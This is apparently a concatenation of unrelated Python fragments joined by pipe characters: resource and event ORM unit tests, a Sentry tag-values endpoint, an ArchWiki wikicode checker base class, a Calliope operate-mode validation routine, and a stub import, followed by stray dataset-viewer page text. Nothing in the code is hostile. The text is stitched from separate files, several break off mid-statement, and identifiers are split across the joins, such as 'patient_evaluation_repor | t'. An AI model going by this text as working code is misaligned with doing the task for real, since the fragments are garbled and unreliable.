{'a': sample1.resource_inputs()['value']})
# {a: sample2} -> sample_dict
signals.connect(sample2, sample_dict, {'value': 'value:a'})
self.assertDictEqual(vi.backtrack_value_emitter(),
{'a': sample2.resource_inputs()['value']})
# sample2 disconnected
signals.disconnect(sample2, sample_dict)
self.assertEqual(vi.backtrack_value_emitter(), vi)
def test_backtrack_dict_list(self):
sample_meta_dir = self.make_resource_meta("""
id: sample
handler: ansible
version: 1.0.0
input:
value:
schema: str!
value:
""")
sample_dict_list_meta_dir = self.make_resource_meta("""
id: sample_dict_list
handler: ansible
version: 1.0.0
input:
value:
schema: [{a: str!}]
value:
""")
sample_dict_list = self.create_resource(
'sample_dict', sample_dict_list_meta_dir
)
vi = sample_dict_list.resource_inputs()['value']
sample1 = self.create_resource(
'sample1', sample_meta_dir, {'value': 'x'}
)
sample2 = self.create_resource(
'sample2', sample_meta_dir, {'value': 'y'}
)
sample3 = self.create_resource(
'sample3', sample_meta_dir, {'value': 'z'}
)
self.assertEqual(vi.backtrack_value_emitter(), vi)
# [{a: sample1}] -> sample_dict_list
signals.connect(sample1, sample_dict_list, {'value': 'value:a'})
self.assertListEqual(vi.backtrack_value_emitter(),
[{'a': sample1.resource_inputs()['value']}])
# [{a: sample1}, {a: sample3}] -> sample_dict_list
signals.connect(sample3, sample_dict_list, {'value': 'value:a'})
self.assertItemsEqual(vi.backtrack_value_emitter(),
[{'a': sample1.resource_inputs()['value']},
{'a': sample3.resource_inputs()['value']}])
# [{a: sample1}, {a: sample2}] -> sample_dict_list
signals.connect(sample2, sample_dict_list, {'value': 'value:a|sample3'})
self.assertItemsEqual(vi.backtrack_value_emitter(),
[{'a': sample1.resource_inputs()['value']},
{'a': sample2.resource_inputs()['value']}])
# sample2 disconnected
signals.disconnect(sample2, sample_dict_list)
self.assertEqual(vi.backtrack_value_emitter(),
[{'a': sample1.resource_inputs()['value']}])
class TestEventORM(BaseResourceTest):
def test_return_emtpy_set(self):
r = orm.DBResource(id='test1', name='test1', base_path='x')
r.save()
self.assertEqual(r.events.as_set(), set())
def test_save_and_load_by_parent(self):
ev = orm.DBEvent(
parent='n1',
parent_action='run',
state='success',
child_action='run',
child='n2',
etype='dependency')
ev.save()
rst = orm.DBEvent.load(ev.id)
self.assertEqual(rst, ev)
def test_save_several(self):
ev = orm.DBEvent(
parent='n1',
parent_action='run',
state='success',
child_action='run',
child='n2',
etype='dependency')
ev.save()
ev1 = orm.DB |
from __future__ import absolute_import
from sentry.api.base import DocSection
from sentry.api.bases.project import ProjectEndpoint
from sentry.api.exceptions import ResourceDoesNotExist
from sentry.api.serializers import serialize
from sentry.models import TagKey, TagKeyStatus, TagValue
class ProjectTagKeyValuesEndpoint(ProjectEndpoint):
doc_section = DocSection.PROJECTS
def get(self, request, project, key):
"""
List a tag's values
Return a list of values associated with this key.
{method} {path}
"""
if key in ('release', 'user', 'filename', 'function'):
lookup_key = 'sentry:{0}'.format(key)
else:
lookup_key = key
try:
tagkey = TagKey.objects.get(
project=project,
key=lookup_key,
status=TagKeyStatus.VISIBLE,
)
except TagKey.DoesNotExist:
raise ResourceDoesNotExist
queryset = TagValue.objects. | filter(
project=project,
key=tagkey.key,
)
return self.paginate(
request=request,
| queryset=queryset,
order_by='-id',
on_results=lambda x: serialize(x, request.user),
)
|
#! /usr/bin/env python3
import contextlib
import threading
import mwparserfromhell
import ws.ArchWiki.lang as lang
from ws.utils import LazyProperty
from ws.parser_helpers.title import canonicalize
from ws.parser_helpers.wikicode import get_parent_wikicode, get_adjacent_node
__all__ = ["get_edit_summary_tracker", "localize_flag", "CheckerBase"]
# WARNING: using the context manager is not thread-safe
def get_edit_summary_tracker(wikicode, summary_parts):
@contextlib.contextmanager
def checker(summary):
text = str(wikicode)
try:
yield
finally:
if text != str(wikicode):
summary_parts.append(summary)
return checker
def localize_flag(wikicode, node, template_name):
"""
If a ``node`` in ``wikicode`` is followed by a template with the same base
name as ``template_name``, this function changes the adjacent template's
name to ``template_name``.
:param wikicode: a :py:class:`mwparserfromhell.wikicode.Wikicode` object
:param node: a :py:class:`mwparserfromhell.nodes.Node` object
:param str template_name: the | name of the template flag, potentially
including a language name
"""
parent = get_parent_wikicode(wikicode, node)
adjacent = get_adjacent_node(parent, node, ignore_whitespace=True)
if isinstance(adjacent, mwparserfromhell.nodes.Template):
adjname = lang.detect_language(str(adjacent.name))[0]
basename = lang.detect_language(template_na | me)[0]
if canonicalize(adjname) == canonicalize(basename):
adjacent.name = template_name
class CheckerBase:
def __init__(self, api, db, *, interactive=False, **kwargs):
self.api = api
self.db = db
self.interactive = interactive
# lock used for synchronizing access to the wikicode AST
# FIXME: the lock should not be an attribute of the checker, but of the wikicode
# maybe we can create a wrapper class (e.g. ThreadSafeWikicode) which would transparently synchronize all method calls: https://stackoverflow.com/a/17494777
# (we would still have to manually lock for wrapper functions and longer parts in the checkers)
self.lock_wikicode = threading.RLock()
@LazyProperty
def _alltemplates(self):
result = self.api.generator(generator="allpages", gapnamespace=10, gaplimit="max", gapfilterredir="nonredirects")
return {page["title"].split(":", maxsplit=1)[1] for page in result}
def get_localized_template(self, template, language="English"):
assert(canonicalize(template) in self._alltemplates)
localized = lang.format_title(template, language)
if canonicalize(localized) in self._alltemplates:
return localized
# fall back to English
return template
def handle_node(self, src_title, wikicode, node, summary_parts):
raise NotImplementedError("the handle_node method was not implemented in the derived class")
|
"""
Copyright (C) 2013-2018 Calliope contributors listed in AUTHORS.
Licensed under the Apache 2.0 License (see LICENSE file).
run_checks.py
~~~~~~~~~~~~~
Checks for model consistency and possible errors when preparing run in the backend.
"""
import ruamel.yaml
import numpy as np
import pandas as pd
import xarray as xr
from calliope.core.attrdict import AttrDict
def check_operate_params(model_data):
"""
if model mode = `operate`, check for clashes in capacity constraints.
In this mode, all capacity constraints are set to parameters in the backend,
so can easily lead to model infeasibility if not checked.
Returns
-------
comments : AttrDict
debug output
warnings : list
possible problems that do not prevent the model run
from continuing
errors : list
serious issues that should raise a ModelError
"""
defaults = ruamel.yaml.load(model_data.attrs['defaults'], Loader=ruamel.yaml.Loader)
warnings, errors = [], []
comments = AttrDict()
def _get_param(loc_tech, var):
if _is_in(loc_tech, var) and not pd.isnull(model_data[var].loc[loc_tech].item()):
param = model_data[var].loc[loc_tech].item()
else:
param = defaults[var]
return param
def _is_in(loc_tech, set_or_var):
try:
model_data[set_or_var].loc[loc_tech]
return True
except (KeyError, AttributeError):
return False
for loc_tech in model_data.loc_techs.values:
energy_cap = model_data.energy_cap.loc[loc_tech].item()
# Must have energy_cap defined for all relevant techs in the model
if (pd.isnull(energy_cap) or np.isinf(energy_cap)) and not _is_in(loc_tech, 'force_resource'):
errors.append(
'Operate mode: User must define a finite energy_cap (via '
'energy_cap_equals or energy_cap_max) for {}'.format(loc_tech)
)
elif _is_in(loc_tech, 'loc_techs_finite_resource'):
# force resource overrides capacity constraints, so set capacity constraints to infinity
if _is_in(loc_tech, 'force_resource'):
if not _is_in(loc_tech, 'loc_techs_store'):
energy_cap = model_data.energy_cap.loc[loc_tech] = np.inf
warnings.append(
'Energy capacity constraint removed from {} as '
'force_resource is applied'.format(loc_tech)
)
if _is_in(loc_tech, 'resource_cap'):
print(loc_tech, model_data.resource_cap.loc_techs_supply_plus)
model_data.resource_cap.loc[loc_tech] = np.inf
warnings.append(
'Resource capacity constraint removed from {} as '
'force_resource is applied'.format(loc_tech)
)
# Cannot have infinite resource area (physically impossible)
if _is_in(loc_tech, 'loc_techs_area'):
area = model_data.resource_area.loc[loc_tech].item()
if pd.isnull(area) or np.isinf(area):
errors.append(
'Operate mode: User must define a finite resource_area '
'(via resource_area_equals or resource_area_max) for {}, '
'as a finite available resource is considered'.format(loc_tech)
)
# Cannot have consumed resource being higher than energy_cap, as
# constraints will clash. Doesn't affect supply_plus techs with a
# storage buffer prior to carrier production.
elif not _is_in(loc_tech, 'loc_techs_store'):
resource_scale = _get_param(loc_tech, 'resource_scale')
energy_cap_scale = _get_param(loc_tech, 'energy_cap_scale')
resource_eff = _get_param(loc_tech, 'resource_eff')
energy_eff = _get_param(loc_tech, 'energy_eff')
resource = model_data.resource.loc[loc_tech].values
if (energy_cap is not None and
any(resource * resource_scale * resource_eff >
energy_cap * energy_cap_scale * energy_eff)):
errors.append(
'Operate mode: resource is forced to be higher than '
'fixed energy cap for `{}`'.format(loc_tech)
)
if _is_in(loc_tech, 'loc_techs_store'):
if _is_in(loc_tech, 'charge_rate'):
storage_cap = model_data.storage_cap.loc[loc_tech].item()
if storage_cap and energy_cap:
charge_rate = model_data['charge_rate'].loc[loc_tech].item()
| if storage_cap * charge_rate < energy_cap:
errors.append(
'fixed storage capacity * charge rate is not larger '
'than fixed energy capacity for loc::tech {}'.format(loc_tech)
| )
# Must define a resource capacity to ensure the Pyomo param is created
# for it. But we just create an array of infs, so the capacity has no effect
if ('resource_cap' not in model_data.data_vars.keys() and
'loc_techs_supply_plus' in model_data.dims.keys()):
model_data['resource_cap'] = xr.DataArray(
[np.inf for i in model_data.loc_techs_supply_plus.values],
dims='loc_techs_supply_plus')
model_data['resource_cap'].attrs['is_result'] = 1
model_data['resource_cap'].attrs['operate_param'] = 1
warnings.append(
'Resource capacity constraint defined and set to infinity '
'for all supply_plus techs'
)
window = model_data.attrs.get('run.operation.window', None)
horizon = model_data.attrs.get('run.operation.horizon', None)
if not window or not horizon:
errors.append(
'Operational mode requires a timestep window and horizon to be '
'defined under run.operation'
)
elif horizon < window:
errors.append(
'Iteration horizon must be larger than iteration window, '
'for operational mode'
)
# Cyclic storage isn't really valid in operate mode, so we ignore it, using
# initial_storage instead (allowing us to pass storage between operation windows)
if model_data.attrs.get('run.cyclic_storage', True):
warnings.append(
'Storage cannot be cyclic in operate run mode, setting '
'`run.cyclic_storage` to False for this run'
)
model_data.attrs['run.cyclic_storage'] = False
return comments, warnings, errors
|
# -*- | coding: utf-8 -*-
from patient_evaluation_repor | t import *
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.